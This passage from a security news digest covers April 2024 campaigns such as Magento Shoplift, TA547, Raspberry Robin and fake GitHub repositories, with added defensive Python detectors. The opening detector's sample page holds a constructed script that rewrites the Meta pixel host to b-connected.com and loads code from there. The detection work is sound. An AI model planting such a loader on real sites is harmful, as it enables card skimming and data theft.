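_SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# Any quoted http(s) URL containing fbevents.js: covers src= attributes and JS literals.
_FBEVENTS_URL_RE = re.compile(r"""["'](https?://[^"']*?fbevents\.js[^"']*)["']""", re.I)
_REPLACE_RE = re.compile(r"""\.replace\(\s*["']connect\.facebook\.net["']""", re.I)


def find_pixel_anomalies(html: str) -> list:
    """Return (reason, evidence) tuples; an empty list means nothing suspicious."""
    findings = []
    for url in _FBEVENTS_URL_RE.findall(html):
        host = urlsplit(url).hostname or ""
        if host != LEGIT_PIXEL_HOST:
            findings.append(("fbevents.js loaded from non-Meta host", url))
    for body in _SCRIPT_RE.findall(html):
        hit = _REPLACE_RE.search(body)
        if hit:
            findings.append(("script rewrites connect.facebook.net at runtime", hit.group(0)))
    return findings


# Constructed sample: a genuine loader, a host-rewriting copy, and a direct foreign load.
SAMPLE_PAGE = """
<script>
!function(f,b,e,v,n,t,s){n=f.fbq=function(){};t=b.createElement(e);t.async=!0;
t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}
(window,document,'script','https://connect.facebook.net/en_US/fbevents.js');
</script>
<script>
var v='https://connect.facebook.net/en_US/fbevents.js'.replace('connect.facebook.net','b-connected.com');
var t=document.createElement('script');t.src=v;document.head.appendChild(t);
</script>
<script src="https://b-connected.com/en_US/fbevents.js"></script>
"""

if __name__ == "__main__":
    for reason, evidence in find_pixel_anomalies(SAMPLE_PAGE):
        print(f"{reason}: {evidence}")
```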
The development comes as Sucuri also revealed that sites built with WordPress and Magento are the target of another malware called Magento Shoplift. Earlier variants of Magento Shoplift have been detected in the wild since September 2023.
The attack chain starts with injecting an obfuscated JavaScript snippet into a legitimate JavaScript file that's responsible for loading a second script from jqueurystatics[.]com via WebSocket Secure (WSS), which, in turn, is designed to facilitate credit card skimming and data theft while masquerading as a Google Analytics script.
"WordPress has become a massive player in e-commerce as well, thanks to the adoption of Woocommerce and other plugins that can easily turn a WordPress site into a fully-featured online store," researcher Puja Srivastava said.
"This popularity also makes WordPress stores a prime target — and attackers are modifying their MageCart e-commerce malware to target a wider range of CMS platforms."
U.S. Federal Agencies Ordered to Hunt for Signs of Microsoft Breach and Mitigate Risks
12.4.24
BigBrothers
The Hacker News
The U.S. Cybersecurity and
Infrastructure Security Agency (CISA) on Thursday issued an emergency directive
(ED 24-02) urging federal agencies to hunt for signs of compromise and enact
preventive measures following the recent compromise of Microsoft's systems that
led to the theft of email correspondence with the company.
The attack, which came to light earlier this year, has been attributed to a Russian nation-state group tracked as Midnight Blizzard (aka APT29 or Cozy Bear). Last month, Microsoft revealed that the adversary managed to access some of its source code repositories but noted that there is no evidence of a breach of customer-facing systems.
The emergency directive, which was originally issued privately to federal agencies on April 2, was first reported on by CyberScoop two days later.
"The threat actor is using information initially exfiltrated from the corporate email systems, including authentication details shared between Microsoft customers and Microsoft by email, to gain, or attempt to gain, additional access to Microsoft customer systems," CISA said.
The agency said the theft of email correspondence between government entities and Microsoft poses severe risks, urging concerned parties to analyze the content of exfiltrated emails, reset compromised credentials, and take additional steps to ensure authentication tools for privileged Microsoft Azure accounts are secure.
It's currently not clear how many federal agencies have had their email exchanges exfiltrated in the wake of the incident, although CISA said all of them have been notified.
The agency is also urging affected entities to perform a cybersecurity impact analysis by April 30, 2024, and provide a status update by May 1, 2024, 11:59 p.m. Other organizations that are impacted by the breach are advised to contact their respective Microsoft account team for any additional questions or follow up.
"Regardless of direct impact, all organizations are strongly encouraged to apply stringent security measures, including strong passwords, multi-factor authentication (MFA) and prohibited sharing of unprotected sensitive information via unsecure channels," CISA said.
The development comes as CISA released a new version of its malware analysis system, called Malware Next-Gen, that allows organizations to submit malware samples (anonymously or otherwise) and other suspicious artifacts for analysis.
TA547 Phishing Attack Hits German Firms with Rhadamanthys Stealer
12.4.24
Phishing
The Hacker News
A threat actor tracked as TA547 has
targeted dozens of German organizations with an information stealer called
Rhadamanthys as part of an invoice-themed phishing campaign.
"This is the first time researchers observed TA547 use Rhadamanthys, an information stealer that is used by multiple cybercriminal threat actors," Proofpoint said. "Additionally, the actor appeared to use a PowerShell script that researchers suspect was generated by a large language model (LLM)."
TA547 is a prolific, financially motivated threat actor that's known to be active since at least November 2017, using email phishing lures to deliver a variety of Android and Windows malware such as ZLoader, Gootkit, DanaBot, Ursnif, and even Adhubllka ransomware.
In recent years, the group has evolved into an initial access broker (IAB) for ransomware attacks. It has also been observed employing geofencing tricks to restrict payloads to specific regions.
The email messages observed as part of the latest campaign impersonate the German company Metro AG and contain a password-protected ZIP file containing a ZIP archive that, when opened, initiates the execution of a remote PowerShell script to launch the Rhadamanthys stealer directly in memory.
Interestingly, the PowerShell script used to load Rhadamanthys includes "grammatically correct and hyper specific comments" for each instruction in the program, raising the possibility that it may have been generated (or rewritten) using an LLM.
The alternate hypothesis is that TA547 copied the script from another source that had used generative AI technology to create it.
"This campaign represents an example of some technique shifts from TA547 including the use of compressed LNKs and previously unobserved Rhadamanthys stealer," Proofpoint said. "It also provides insight into how threat actors are leveraging likely LLM-generated content in malware campaigns."
The development comes as phishing campaigns have also been banking on uncommon tactics to facilitate credential-harvesting attacks. In these emails, recipients are notified of a voice message and are directed to click on a link to access it.
The payload retrieved from the URL is heavily obfuscated HTML content that runs JavaScript code embedded within an SVG image when the page is rendered on the target system.
Present within the SVG data is "encrypted data containing a second stage page
prompting the target to enter their credentials to access the voice message,"
Binary Defense said, adding that the page is encrypted using CryptoJS.
Other email-based attacks have paved the way for Agent Tesla, which has emerged as an attractive option for threat actors due to it "being an affordable malware service with multiple capabilities to exfiltrate and steal users' data," according to Cofense.
Social engineering campaigns have also taken the form of malicious ads served on search engines like Google that lure unsuspecting users into downloading bogus installers for popular software like PuTTY, FileZilla, and Room Planner to ultimately deploy Nitrogen and IDAT Loader.
The infection chain associated with IDAT Loader is noteworthy for the fact that the MSIX installer is used to launch a PowerShell script that, in turn, contacts a Telegram bot to fetch a second PowerShell script hosted on the bot.
This PowerShell script then acts as a conduit to deliver another PowerShell script that's used to bypass Windows Antimalware Scan Interface (AMSI) protections as well as trigger the execution of the loader, which subsequently proceeds to load the SectopRAT trojan.
"Endpoints can be protected from malicious ads via group policies that restrict traffic coming from the main and lesser known ad networks," Jérôme Segura, principal threat researcher at Malwarebytes, said.
Apple Updates Spyware Alert System to Warn Victims of Mercenary Attacks
11.4.24
OS
The Hacker News
Apple on Wednesday revised its
documentation pertaining to its mercenary spyware threat notification system to
mention that it alerts users when they may have been individually targeted by
such attacks.
It also specifically called out companies like NSO Group for developing commercial surveillance tools such as Pegasus that are used by state actors to pull off "individually targeted attacks of such exceptional cost and complexity."
"Though deployed against a very small number of individuals — often journalists, activists, politicians, and diplomats — mercenary spyware attacks are ongoing and global," Apple said.
"The extreme cost, sophistication, and worldwide nature of mercenary spyware attacks makes them some of the most advanced digital threats in existence today."
The update marks a change in wording that previously said these "threat notifications" are designed to inform and assist users who may have been targeted by state-sponsored attackers.
According to TechCrunch, Apple is said to have sent threat notifications to iPhone users in 92 countries at 12:00 p.m. PST on Wednesday coinciding with the revision to the support page.
It's worth noting that Apple began sending threat notifications to warn users it believes have been targeted by state-sponsored attackers starting November 2021.
However, the company also makes it a point to emphasize that it does not "attribute the attacks or resulting threat notifications" to any particular threat actor or geographical region.
The development comes amid continued efforts by governments around the world to counter the misuse and proliferation of commercial spyware.
Last month, the U.S. government said Finland, Germany, Ireland, Japan, Poland, and South Korea had joined an inaugural group of 11 countries working to develop safeguards against the abuse of invasive surveillance technology.
"Commercial spyware has been misused across the world by authoritarian regimes and in democracies [...] without proper legal authorization, safeguards, or oversight," the governments said in a joint statement.
"The misuse of these tools presents significant and growing risks to our
national security, including to the safety and security of our government
personnel, information, and information systems."
According to a recent report published by Google's Threat Analysis Group (TAG) and Mandiant, commercial surveillance vendors were behind the in-the-wild exploitation of a chunk of the 97 zero-day vulnerabilities discovered in 2023.
All the vulnerabilities attributed to spyware companies targeted web browsers – particularly flaws in third-party libraries that affect more than one browser and substantially increase the attack surface – and mobile devices running Android and iOS.
"Private sector firms have been involved in discovering and selling exploits for many years, but we have observed a notable increase in exploitation driven by these actors over the past several years," the tech giant said.
"Threat actors are increasingly leveraging zero-days, often for the purposes of evasion and persistence, and we don't expect this activity to decrease anytime soon."
Google also said that increased security investments into exploit mitigations are affecting the types of vulnerabilities threat actors can weaponize in their attacks, forcing them to bypass several security guardrails (e.g., Lockdown Mode and MiraclePtr) to infiltrate target devices.
Fortinet Rolls Out Critical Security Patches for FortiClientLinux Vulnerability
11.4.24
Vulnerability
The Hacker News
Fortinet has released patches to
address a critical security flaw impacting FortiClientLinux that could be
exploited to achieve arbitrary code execution.
Tracked as CVE-2023-45590, the vulnerability carries a CVSS score of 9.4 out of a maximum of 10.
"An Improper Control of Generation of Code ('Code Injection') vulnerability [CWE-94] in FortiClientLinux may allow an unauthenticated attacker to execute arbitrary code via tricking a FortiClientLinux user into visiting a malicious website," Fortinet said in an advisory.
The shortcoming, which has been described as a case of remote code execution due to a "dangerous nodejs configuration," impacts the following versions -
FortiClientLinux versions 7.0.3 through 7.0.4 and 7.0.6 through 7.0.10 (Upgrade to 7.0.11 or above)
FortiClientLinux version 7.2.0 (Upgrade to 7.2.1 or above)
Security researcher CataLpa from Dbappsecurity has been credited with
discovering and reporting the vulnerability.
Fortinet's security patches for April 2024 also address an issue with the FortiClientMac installer that could also lead to code execution (CVE-2023-45588 and CVE-2024-31492, CVSS scores: 7.8).
Also resolved is a FortiOS and FortiProxy bug that could leak administrator cookies in certain scenarios (CVE-2023-41677, CVSS score: 7.5).
While there is no evidence of any of the flaws being exploited in the wild, it's recommended that users keep their systems up-to-date to mitigate potential threats.
'eXotic Visit' Spyware Campaign Targets Android Users in India and Pakistan
11.4.24
OS
The Hacker News
An active Android malware campaign
dubbed eXotic Visit has been primarily targeting users in South Asia,
particularly those in India and Pakistan, with malware distributed via dedicated
websites and Google Play Store.
Slovak cybersecurity firm ESET said the activity, ongoing since November 2021, is not linked to any known threat actor or group. It's tracking the group behind the operation under the name Virtual Invaders.
"Downloaded apps provide legitimate functionality, but also include code from the open-source Android XploitSPY RAT," ESET security researcher Lukáš Štefanko said in a technical report released today.
The campaign is said to be highly targeted in nature, with the apps available on Google Play having a negligible number of installs ranging from zero to 45. The apps have since been taken down.
The fake-but-functional apps primarily masquerade as messaging services like Alpha Chat, ChitChat, Defcom, Dink Messenger, Signal Lite, TalkU, WeTalk, Wicker Messenger, and Zaangi Chat. Approximately 380 victims are said to have downloaded the apps and created accounts to use them for messaging purposes.
Also employed as part of eXotic Visit are apps such as Sim Info and Telco DB, both of which claim to provide details about SIM owners simply by entering a Pakistan-based phone number. Other applications pass off as a food ordering service in Pakistan as well as a legitimate Indian hospital called Specialist Hospital (now rebranded as Trilife Hospital).
XploitSPY, uploaded to GitHub as early as April 2020 by a user named RaoMK, is
associated with an Indian cyber security solutions company called XploitWizer.
It has also been described as a fork of another open-source Android trojan
called L3MON, which, in turn, draws inspiration from AhMyth.
It comes with a wide gamut of features that allow it to gather sensitive data from infected devices, such as GPS locations, microphone recordings, contacts, SMS messages, call logs, and clipboard content; extract notification details from apps like WhatsApp, Facebook, Instagram, and Gmail; download and upload files; view installed apps; and queue commands.
On top of that, the malicious apps are designed to take pictures and enumerate files in several directories related to screenshots, WhatsApp, WhatsApp Business, Telegram, and an unofficial WhatsApp mod known as GBWhatsApp.
"Throughout the years, these threat actors have customized their malicious code by adding obfuscation, emulator detection, hiding of [command-and-control] addresses, and use of a native library," Štefanko said.
The main purpose of the native library ("defcome-lib.so") is to keep the C2 server information encoded and hidden from static analysis tools. If an emulator is detected, the app makes use of a fake C2 server to evade detection.
Some of the apps have been propagated through websites specifically created for this purpose ("chitchat.ngrok[.]io") that provide a link to an Android package file ("ChitChat.apk") hosted on GitHub. It's presently not clear how victims are directed to these apps.
"Distribution started on dedicated websites and then even moved to the official Google Play store," Štefanko concluded. "The purpose of the campaign is espionage and probably is targeting victims in Pakistan and India."
Raspberry Robin Returns: New Malware Campaign Spreading Through WSF Files
11.4.24
Virus
The Hacker News
Cybersecurity researchers have
discovered a new Raspberry Robin campaign wave that propagates the malware
through malicious Windows Script Files (WSFs) since March 2024.
"Historically, Raspberry Robin was known to spread through removable media like USB drives, but over time its distributors have experimented with other initial infection vectors," HP Wolf Security researcher Patrick Schläpfer said in a report shared with The Hacker News.
Raspberry Robin, also called QNAP worm, was first spotted in September 2021 and has since evolved into a downloader for various other payloads, such as SocGholish, Cobalt Strike, IcedID, BumbleBee, and TrueBot, while also serving as a precursor for ransomware.
While the malware was initially distributed by means of USB devices containing LNK files that retrieved the payload from a compromised QNAP device, it has since adopted other methods such as social engineering and malvertising.
It's attributed to an emerging threat cluster tracked by Microsoft as Storm-0856, which has links to the broader cybercrime ecosystem comprising groups like Evil Corp, Silence, and TA505.
The latest distribution vector entails the use of WSF files that are offered for download via various domains and subdomains.
It's currently not clear how the attackers are directing victims to these URLs, although it's suspected that it could be either via spam or malvertising campaigns.
The heavily obfuscated WSF file functions as a downloader that retrieves the main DLL payload from a remote server using the curl command, but not before a series of anti-analysis and anti-virtual-machine checks are carried out to determine whether it is running in a virtualized environment.
It's also designed to terminate the execution if the build number of the Windows operating system is lower than 17063 (which was released in December 2017) and if the list of running processes includes antivirus processes associated with Avast, Avira, Bitdefender, Check Point, ESET, and Kaspersky.
What's more, it configures Microsoft Defender Antivirus exclusion rules in an effort to sidestep detection by adding the entire main drive to the exclusion list and preventing it from being scanned.
"The scripts themselves are currently not classified as malicious by any anti-virus scanners on VirusTotal, demonstrating the evasiveness of the malware and the risk of it causing a serious infection with Raspberry Robin," HP said.
"The WSF downloader is heavily obfuscated and uses many anti-analysis techniques enabling the malware to evade detection and slow down analysis."
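One of the behaviours described above, adding the whole system drive to the Defender exclusion list, leaves a trace that defenders can hunt for: Microsoft Defender logs every configuration change as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, with the registry value that changed in its message. The following is an added example and not code from HP Wolf Security or the article; the three event messages are constructed to mirror the "Old value / New value" layout of 5007 messages, and the severity tiers are this example's own choice.

```python
"""Flag Microsoft Defender exclusion changes that cover an entire drive.

Added example (not from HP's report). Event ID 5007 messages name the
registry value that changed; exclusion changes live under
HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\{Paths,Extensions,Processes}.
"""
import re
from dataclasses import dataclass

# Constructed sample: 5007 messages as exported from the Defender Operational
# log (not real telemetry). Event 2 is the whole-drive exclusion.
SAMPLE_EVENTS = [
    "Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.\n"
    "\tOld value: \n"
    "\tNew value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Program Files\\Vendor\\app.exe = 0x0",
    "Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.\n"
    "\tOld value: \n"
    "\tNew value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\ = 0x0",
    "Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.\n"
    "\tOld value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring = 0x0\n"
    "\tNew value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableRealtimeMonitoring = 0x1",
]

# Only "New value" lines matter: they describe the exclusion that was added.
EXCLUSION_RE = re.compile(
    r"New value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\"
    r"(?P<kind>Paths|Extensions|Processes)\\(?P<value>.+?) = 0x"
)
DRIVE_ROOT_RE = re.compile(r"^[A-Za-z]:\\?$")  # "C:" or "C:\"


@dataclass
class ExclusionFinding:
    kind: str
    value: str
    severity: str
    reason: str


def classify_exclusion(kind: str, value: str) -> ExclusionFinding:
    """Rate how much scanning coverage a single exclusion removes."""
    norm = value.rstrip("\\")
    if kind == "Paths":
        if DRIVE_ROOT_RE.match(norm):
            return ExclusionFinding(kind, value, "high", "entire drive excluded from scanning")
        if norm.count("\\") <= 1:  # top-level folder such as C:\Users
            return ExclusionFinding(kind, value, "medium", "top-level folder excluded")
        return ExclusionFinding(kind, value, "low", "specific path excluded")
    if kind == "Extensions":
        return ExclusionFinding(kind, value, "medium", "every file with this extension excluded")
    return ExclusionFinding(kind, value, "low", "process exclusion")


def parse_exclusions(events):
    """Extract and classify every exclusion added across a batch of 5007 messages."""
    findings = []
    for msg in events:
        m = EXCLUSION_RE.search(msg)
        if not m:
            continue  # some other setting changed (e.g. real-time protection toggle)
        findings.append(classify_exclusion(m.group("kind"), m.group("value").strip()))
    return findings


def high_risk_exclusions(events):
    return [f for f in parse_exclusions(events) if f.severity == "high"]


if __name__ == "__main__":
    for f in parse_exclusions(SAMPLE_EVENTS):
        print(f"{f.severity:6} {f.kind:10} {f.value!r}: {f.reason}")
```

Feed it the exported messages of 5007 events (for example from `Get-WinEvent` on the Operational log, or your SIEM's copy of it); a "high" finding from a process that is not your endpoint-management tooling is worth an immediate look, since a legitimate administrator rarely needs to exclude a drive root.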
Beware: GitHub's Fake Popularity Scam Tricking Developers into Downloading
Malware
11.4.24
Spam
The Hacker News
Threat actors are now taking advantage of GitHub's search functionality to trick unsuspecting users looking for popular repositories into downloading spurious counterparts that serve malware.
The latest assault on the open-source software supply chain involves concealing malicious code within Microsoft Visual Code project files that are designed to download next-stage payloads from a remote URL, Checkmarx said in a report shared with The Hacker News.
"Attackers create malicious repositories with popular names and topics, using techniques like automated updates and fake stars to boost search rankings and deceive users," security researcher Yehuda Gelb said.
The idea is to manipulate GitHub's search rankings so that threat actor-controlled repositories surface at the top when users filter and sort results by most recent update, and to inflate their apparent popularity with bogus stars added from fake accounts.
In doing so, the attack lends a veneer of legitimacy and trust to the fraudulent repositories, effectively deceiving developers into downloading them.
"In contrast to past incidents where attackers were found to add hundreds or thousands of stars to their repos, it appears that in these cases, the attackers opted for a more modest number of stars, probably to avoid raising suspicion with an exaggerated number," Gelb said.
It's worth pointing out that previous research from Checkmarx late last year uncovered a black market comprising online stores and chat groups that are selling GitHub stars to artificially boost a repository's popularity, a technique referred to as star inflation.
What's more, a majority of these repositories are disguised as legitimate projects related to popular games, cheats, and tools, adding another layer of sophistication to make it harder to distinguish them from benign code.
Some repositories have been observed downloading an encrypted .7z file
containing an executable named "feedbackAPI.exe" that has been inflated to 750
MB in a likely attempt to evade antivirus scanning and ultimately launch malware
that shares similarities with Keyzetsu clipper.
The Windows malware, which came to light early last year, is often distributed through pirated software such as Evernote. It's capable of diverting cryptocurrency transactions to attacker-owned wallets by substituting the wallet address copied in the clipboard.
The findings underscore the due diligence that developers must follow when downloading source code from open-source repositories, not to mention the dangers of solely relying on reputation as a metric to evaluate trustworthiness.
"The use of malicious GitHub repositories to distribute malware is an ongoing trend that poses a significant threat to the open-source ecosystem," Gelb said.
"By exploiting GitHub's search functionality and manipulating repository properties, attackers can lure unsuspecting users into downloading and executing malicious code."
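The two ranking signals the article says are being gamed, a trickle of fresh stars and machine-driven "automated updates", both leave statistical fingerprints that a developer can check before trusting a repository. The following is an added example, not Checkmarx's code or a published detection: the heuristics (share of stargazers whose account was created shortly before starring, how tightly stars cluster in time, and how regular the commit cadence is) and the threshold values are this example's own choices, and the two repositories are constructed. The GitHub REST API exposes the fields assumed here: a stargazer's `starred_at` with the `application/vnd.github.star+json` Accept header and an account's `created_at` from the user endpoint.

```python
"""Heuristic star-inflation score for a GitHub repository (added example).

Input is two lists per repository: (account created_at, starred_at) pairs for
its stargazers and commit timestamps. Each signal is a ratio in [0, 1]; the
score averages them, so 0.9 reads as "almost every signal looks synthetic".
"""
from datetime import datetime, timedelta
from statistics import median


def parse(ts: str) -> datetime:
    return datetime.fromisoformat(ts)


# Constructed: stars from accounts a few days old, all landing within one
# morning, and commits arriving every 24 h to the second.
SUSPECT = {
    "stargazers": [
        ("2024-03-28T08:00:00", "2024-04-01T09:00:00"),
        ("2024-03-29T08:05:00", "2024-04-01T09:03:00"),
        ("2024-03-29T08:10:00", "2024-04-01T09:05:00"),
        ("2024-03-30T11:00:00", "2024-04-01T10:00:00"),
        ("2021-06-10T12:00:00", "2024-04-01T15:00:00"),  # one organic-looking star
    ],
    "commits": [f"2024-03-{d}T03:00:00" for d in range(25, 30)],
}

# Constructed: old accounts starring months apart, commits landing whenever.
ORGANIC = {
    "stargazers": [
        ("2018-01-05T10:00:00", "2023-11-02T14:00:00"),
        ("2016-07-19T08:00:00", "2024-01-15T19:30:00"),
        ("2020-02-02T02:00:00", "2024-02-20T06:00:00"),
        ("2019-09-09T09:00:00", "2024-03-30T22:00:00"),
        ("2017-03-03T03:00:00", "2024-04-01T12:00:00"),
    ],
    "commits": [
        "2024-01-03T14:12:00", "2024-01-10T09:40:00", "2024-02-02T17:05:00",
        "2024-02-04T11:00:00", "2024-03-15T08:30:00",
    ],
}


def fresh_account_ratio(stargazers, max_age_days=30):
    """Share of stars given by accounts younger than max_age_days at star time."""
    if not stargazers:
        return 0.0
    fresh = sum(1 for created, starred in stargazers
                if (parse(starred) - parse(created)).days < max_age_days)
    return fresh / len(stargazers)


def star_burst_ratio(stargazers, window_hours=24):
    """Largest share of all stars that fall inside any single time window."""
    times = sorted(parse(starred) for _, starred in stargazers)
    if not times:
        return 0.0
    window = timedelta(hours=window_hours)
    best = j = 0
    for i in range(len(times)):
        while j < len(times) and times[j] - times[i] <= window:
            j += 1
        best = max(best, j - i)
    return best / len(times)


def commit_regularity(commits, tolerance=0.05):
    """Share of inter-commit gaps within +/-tolerance of the median gap.

    Human commit histories are irregular; a value near 1.0 means the commits
    arrive on a schedule, which is what a bot keeping a repo "recently updated" does.
    """
    times = sorted(parse(c) for c in commits)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if len(gaps) < 2:
        return 0.0
    med = median(gaps)
    if med == 0:
        return 0.0
    return sum(1 for g in gaps if abs(g - med) <= tolerance * med) / len(gaps)


def inflation_score(repo):
    """Return (overall score rounded to 2 places, per-signal ratios)."""
    signals = {
        "fresh_accounts": fresh_account_ratio(repo["stargazers"]),
        "star_burst": star_burst_ratio(repo["stargazers"]),
        "scheduled_commits": commit_regularity(repo["commits"]),
    }
    return round(sum(signals.values()) / len(signals), 2), signals


if __name__ == "__main__":
    for name, repo in (("suspect", SUSPECT), ("organic", ORGANIC)):
        print(name, inflation_score(repo))
```

The score is a triage aid, not a verdict: a genuinely viral project can show a star burst, and a release bot can produce regular commits. It is the combination with fresh accounts, on a repository advertising game cheats or "tools", that should stop a download.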
The development comes as Phylum said it discovered an uptick in the number of spam (i.e., non-malicious) packages being published to the npm registry by a user named ylmin to orchestrate a "massive automated crypto farming campaign" that abuses the Tea protocol.
"The Tea protocol is a web3 platform whose stated goal is compensating open source package maintainers, but instead of cash rewards, they are rewarded with TEA tokens, a cryptocurrency," the company's research team said.
"The Tea protocol is not even live yet. These users are farming points from the 'Incentivized Testnet,' apparently with the expectation that having more points in the Testnet will increase their odds of receiving a later airdrop."
Researchers Uncover First Native Spectre v2 Exploit Against Linux Kernel
10.4.24
Exploit
The Hacker News
Cybersecurity researchers have
disclosed what they say is the "first native Spectre v2 exploit" against the
Linux kernel on Intel systems that could be exploited to read sensitive data
from the memory.
The exploit, called Native Branch History Injection (BHI), can be used to leak arbitrary kernel memory at 3.5 kB/sec by bypassing existing Spectre v2/BHI mitigations, researchers from Systems and Network Security Group (VUSec) at Vrije Universiteit Amsterdam said in a new study.
The shortcoming is being tracked as CVE-2024-2201.
BHI was first disclosed by VUSec in March 2022, describing it as a technique that can get around Spectre v2 protections in modern processors from Intel, AMD, and Arm.
While the attack leveraged extended Berkeley Packet Filters (eBPF), Intel's recommendations to address the problem included, among other things, disabling Linux's unprivileged eBPF.
"Privileged managed runtimes that can be configured to allow an unprivileged user to generate and execute code in a privileged domain -- such as Linux's 'unprivileged eBPF' -- significantly increase the risk of transient execution attacks, even when defenses against intra-mode [Branch Target Injection] are present," Intel said at the time.
"The kernel can be configured to deny access to unprivileged eBPF by default,
while still allowing administrators to enable it at runtime where needed."
Native BHI neutralizes this countermeasure by showing that BHI is possible
without eBPF. It impacts all Intel systems that are susceptible to BHI.
As a result, it makes it possible for an attacker with access to CPU resources
to influence speculative execution paths via malicious software installed on a
machine with the goal of extracting sensitive data that are associated with a
different process.
"Existing mitigation techniques of disabling privileged eBPF and enabling
(Fine)IBT are insufficient in stopping BHI exploitation against the
kernel/hypervisor," the CERT Coordination Center (CERT/CC) said in an advisory.
"An unauthenticated attacker can exploit this vulnerability to leak privileged
memory from the CPU by speculatively jumping to a chosen gadget."
The disclosure comes weeks after IBM and VUSec detailed GhostRace
(CVE-2024-2193), a variant of Spectre v1 that employs a combination of
speculative execution and race conditions to leak data from contemporary CPU
architectures.
It also follows new research from ETH Zurich that disclosed a family of attacks
dubbed Ahoi Attacks that could be used to compromise hardware-based trusted
execution environments (TEEs) and break confidential virtual machines (CVMs)
like AMD Secure Encrypted Virtualization-Secure Nested Paging (SEV-SNP) and
Intel Trust Domain Extensions (TDX).
The attacks, codenamed Heckler and WeSee, make use of malicious interrupts to
break the integrity of CVMs, potentially allowing threat actors to remotely log
in and gain elevated access, as well as perform arbitrary read, write, and code
injection to disable firewall rules and open a root shell.
"For Ahoi Attacks, an attacker can use the hypervisor to inject malicious
interrupts to the victim's vCPUs and trick it into executing the interrupt
handlers," the researchers said. "These interrupt handlers can have global
effects (e.g., changing the register state in the application) that an attacker
can trigger to compromise the victim's CVM."
In response to the findings, AMD said the vulnerability is rooted in the Linux
kernel implementation of SEV-SNP and that fixes addressing some of the issues
have been upstreamed to the main Linux kernel.
The flaw has been confirmed to affect Illumos, Intel, Red Hat, SUSE Linux,
Triton Data Center, and Xen. AMD, in a bulletin, said it's not "aware of any
impact" on its products.
Microsoft Fixes 149 Flaws in Huge April Patch Release, Zero-Days Included
10.4.24
OS
The Hacker News
Microsoft has released security
updates for the month of April 2024 to remediate a record 149 flaws, two of
which have come under active exploitation in the wild.
Of the 149 flaws, three are rated Critical, 142 are rated Important, three are rated Moderate, and one is rated Low in severity. The update is in addition to 21 vulnerabilities that the company addressed in its Chromium-based Edge browser following the release of the March 2024 Patch Tuesday fixes.
The two shortcomings that have come under active exploitation are below -
CVE-2024-26234 (CVSS score: 6.7) - Proxy Driver Spoofing Vulnerability
CVE-2024-29988 (CVSS score: 8.8) - SmartScreen Prompt Security Feature Bypass
Vulnerability
While Microsoft's own advisory provides no information about
CVE-2024-26234, cybersecurity firm Sophos said it discovered in December 2023 a
malicious executable ("Catalog.exe" or "Catalog Authentication Client Service")
that's signed by a valid Microsoft Windows Hardware Compatibility Publisher
(WHCP) certificate.
Authenticode analysis of the binary has revealed the original requesting publisher to be Hainan YouHu Technology Co. Ltd, which is also the publisher of another tool called LaiXi Android Screen Mirroring.
The latter is described as "a marketing software ... [that] can connect hundreds of mobile phones and control them in batches, and automate tasks like batch following, liking, and commenting."
Present within the purported authentication service is a component called 3proxy that's designed to monitor and intercept network traffic on an infected system, effectively acting as a backdoor.
"We have no evidence to suggest that the LaiXi developers deliberately embedded the malicious file into their product, or that a threat actor conducted a supply chain attack to insert it into the compilation/building process of the LaiXi application," Sophos researcher Andreas Klopsch said.
The cybersecurity company also said it discovered multiple other variants of the backdoor in the wild going all the way back to January 5, 2023, indicating that the campaign has been underway at least since then. Microsoft has since added the relevant files to its revocation list.
The other security flaw that has reportedly come under active attack is CVE-2024-29988, which – like CVE-2024-21412 and CVE-2023-36025 – allows attackers to sidestep Microsoft Defender Smartscreen protections when opening a specially crafted file.
"To exploit this security feature bypass vulnerability, an attacker would need to convince a user to launch malicious files using a launcher application that requests that no UI be shown," Microsoft said.
"In an email or instant message attack scenario, the attacker could send the targeted user a specially crafted file that is designed to exploit the remote code execution vulnerability."
The Zero Day Initiative revealed that there is evidence of the flaw being exploited in the wild, although Microsoft has tagged it with an "Exploitation More Likely" assessment.
Another vulnerability of importance is CVE-2024-29990 (CVSS score: 9.0), an elevation of privilege flaw impacting Microsoft Azure Kubernetes Service Confidential Container that could be exploited by unauthenticated attackers to steal credentials.
"An attacker can access the untrusted AKS Kubernetes node and AKS Confidential Container to take over confidential guests and containers beyond the network stack it might be bound to," Redmond said.
In all, the release is notable for addressing as many as 68 remote code execution, 31 privilege escalation, 26 security feature bypass, and six denial-of-service (DoS) bugs. Interestingly, 24 of the 26 security bypass flaws are related to Secure Boot.
"While none of these Secure Boot vulnerabilities addressed this month were exploited in the wild, they serve as a reminder that flaws in Secure Boot persist, and we could see more malicious activity related to Secure Boot in the future," Satnam Narang, senior staff research engineer at Tenable, said in a statement.
The disclosure comes as Microsoft has faced criticism for its security practices, with a recent report from the U.S. Cyber Safety Review Board (CSRB) calling out the company for not doing enough to prevent a cyber espionage campaign orchestrated by a Chinese threat actor tracked as Storm-0558 last year.
It also follows the company's decision to publish root cause data for security flaws using the Common Weakness Enumeration (CWE) industry standard. However, it's worth noting that the changes are only in effect starting from advisories published since March 2024.
"The addition of CWE assessments to Microsoft security advisories helps pinpoint the generic root cause of a vulnerability," Adam Barnett, lead software engineer at Rapid7, said in a statement shared with The Hacker News.
"The CWE program has recently updated its guidance on mapping CVEs to a CWE Root Cause. Analysis of CWE trends can help developers reduce future occurrences through improved Software Development Life Cycle (SDLC) workflows and testing, as well as helping defenders understand where to direct defense-in-depth and deployment-hardening efforts for best return on investment."
In a related development, cybersecurity firm Varonis detailed two methods that attackers could adopt to circumvent audit logs and avoid triggering download events while exfiltrating files from SharePoint.
